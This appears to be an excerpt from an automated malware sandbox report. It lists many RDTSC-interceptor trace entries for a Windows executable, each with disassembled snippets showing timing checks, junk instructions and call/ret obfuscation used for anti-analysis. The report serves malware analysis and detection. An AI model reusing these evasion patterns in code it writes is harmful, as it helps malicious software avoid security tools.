              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A468 second address: 127A478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6778CEBE46h 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A478 second address: 127A482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A482 second address: 127A48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A5D2 second address: 127A5E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F67787C0192h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A5E3 second address: 127A5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A5E9 second address: 127A5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F67787C018Ch 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B904 second address: 125B908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C9D3 second address: 125C9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B908 second address: 125B912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DB44 second address: 125DB48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C9D7 second address: 125C9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B912 second address: 125B916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125C9DD second address: 125C9F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DB48 second address: 125DBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F67787C018Ch 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D3199h], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F67787C0188h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 pushad 0x00000039 or dword ptr [ebp+1246D150h], eax 0x0000003f mov esi, dword ptr [ebp+122D1E22h] 0x00000045 popad 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d xor dword ptr [ebp+122D27BAh], edx 0x00000053 mov ebx, 13F66866h 0x00000058 mov eax, dword ptr [ebp+122D0CD1h] 0x0000005e mov dword ptr [ebp+12458764h], edx 0x00000064 push FFFFFFFFh 0x00000066 or ebx, dword ptr [ebp+1247CB69h] 0x0000006c push eax 0x0000006d pushad 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DBC2 second address: 125DBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DBC8 second address: 125DBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1260A6E second address: 1260A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1260A74 second address: 1260A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261B18 second address: 1261B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6778CEBE52h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F6778CEBE54h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EFF4 second address: 127EFFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EFFE second address: 127F008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6778CEBE46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F008 second address: 127F025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F67787C0192h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F30D second address: 127F313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F313 second address: 127F318 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F48A second address: 127F48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F48F second address: 127F49A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F67787C0186h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EA76 second address: 127EA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6778CEBE46h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EA83 second address: 127EA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F906 second address: 127F916 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6778CEBE48h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127FD51 second address: 127FD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127FD57 second address: 127FD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127FD5B second address: 127FD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282C0C second address: 1282C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A1A1 second address: 128A1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A1A5 second address: 128A1D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE4Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007F6778CEBE46h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6778CEBE4Eh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A1D8 second address: 128A1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A32E second address: 128A333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A333 second address: 128A351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0192h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007F67787C0186h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A351 second address: 128A355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A4C8 second address: 128A4D6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AA66 second address: 128AA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6778CEBE50h 0x00000009 jmp 00007F6778CEBE4Ch 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AD93 second address: 128ADB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C0199h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128ADB0 second address: 128ADD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6778CEBE50h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B2BC second address: 128B2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124EC00 second address: 124EC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124EC05 second address: 124EC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124ED4F second address: 124EDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xchg eax, ebx 0x00000006 mov ecx, dword ptr [ebp+122D368Fh] 0x0000000c push dword ptr fs:[00000000h] 0x00000013 add dword ptr [ebp+122D19EBh], esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 jmp 00007F6778CEBE4Bh 0x00000025 mov dword ptr [ebp+124929A0h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F6778CEBE48h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 cmp dword ptr [ebp+122D2BC5h], 00000000h 0x0000004c jne 00007F6778CEBF22h 0x00000052 and cx, A677h 0x00000057 mov byte ptr [ebp+122D3673h], 00000047h 0x0000005e push 00000000h 0x00000060 push edx 0x00000061 call 00007F6778CEBE48h 0x00000066 pop edx 0x00000067 mov dword ptr [esp+04h], edx 0x0000006b add dword ptr [esp+04h], 00000017h 0x00000073 inc edx 0x00000074 push edx 0x00000075 ret 0x00000076 pop edx 0x00000077 ret 0x00000078 mov edx, 5BAD99B3h 0x0000007d mov eax, D49AA7D2h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F6778CEBE4Dh 0x0000008c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124EDF1 second address: 124EE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124EE06 second address: 124EE10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F2A0 second address: 124F2CC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 09893DA6h 0x00000011 mov dx, 86EAh 0x00000015 push F55E9819h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F67787C018Eh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F2CC second address: 124F2E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F2E4 second address: 124F2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F448 second address: 124F4AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xchg eax, esi 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F6778CEBE48h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D327Bh], edx 0x00000028 nop 0x00000029 pushad 0x0000002a jmp 00007F6778CEBE50h 0x0000002f jmp 00007F6778CEBE4Bh 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F6778CEBE57h 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F5A8 second address: 124F5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F67787C0186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F5B2 second address: 124F5C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F5C4 second address: 124F5CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F5CA second address: 124F5E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F6778CEBE46h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F5E5 second address: 124F618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F67787C0196h 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F67787C0186h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FD4E second address: 124FD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FD52 second address: 124FD56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FEFE second address: 124FF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124FFD9 second address: 1250043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ecx 0x0000000b push esi 0x0000000c or dh, FFFFFF91h 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 lea eax, dword ptr [ebp+1249298Ch] 0x00000017 jmp 00007F67787C018Ch 0x0000001c mov edx, 1FE92BF9h 0x00000021 push eax 0x00000022 jmp 00007F67787C0199h 0x00000027 mov dword ptr [esp], eax 0x0000002a mov ecx, dword ptr [ebp+122D3679h] 0x00000030 lea eax, dword ptr [ebp+12492948h] 0x00000036 mov edx, 6C6BC291h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jng 00007F67787C0188h 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250043 second address: 125004D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125004D second address: 123230D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F67787C0197h 0x0000000e call dword ptr [ebp+122D17E5h] 0x00000014 push ecx 0x00000015 jmp 00007F67787C0192h 0x0000001a pop ecx 0x0000001b push eax 0x0000001c jp 00007F67787C018Eh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129076C second address: 1290790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6778CEBE4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6778CEBE4Fh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290912 second address: 1290918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290918 second address: 129091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290EBD second address: 1290ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F67787C0186h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290ECE second address: 1290EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F6778CEBE48h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f jmp 00007F6778CEBE52h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F6778CEBE46h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290EF8 second address: 1290EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293765 second address: 129376A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129376A second address: 1293782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C018Eh 0x00000009 jnl 00007F67787C0186h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293485 second address: 129348B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129348B second address: 129348F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129348F second address: 129349B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129349B second address: 129349F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12960A2 second address: 12960A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12961CC second address: 12961D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12961D0 second address: 12961E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6778CEBE4Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12961E4 second address: 12961EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129636F second address: 1296373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296373 second address: 12963AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67787C0192h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F67787C0198h 0x00000011 jnl 00007F67787C0186h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296562 second address: 1296570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F6778CEBE46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296570 second address: 1296574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129C0F8 second address: 129C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129C0FC second address: 129C129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0196h 0x00000007 jmp 00007F67787C018Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F67787C0186h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129C129 second address: 129C140 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d js 00007F6778CEBE46h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129C140 second address: 129C146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129C146 second address: 129C155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F6778CEBE46h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129C155 second address: 129C159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129C159 second address: 129C15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129B563 second address: 129B567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
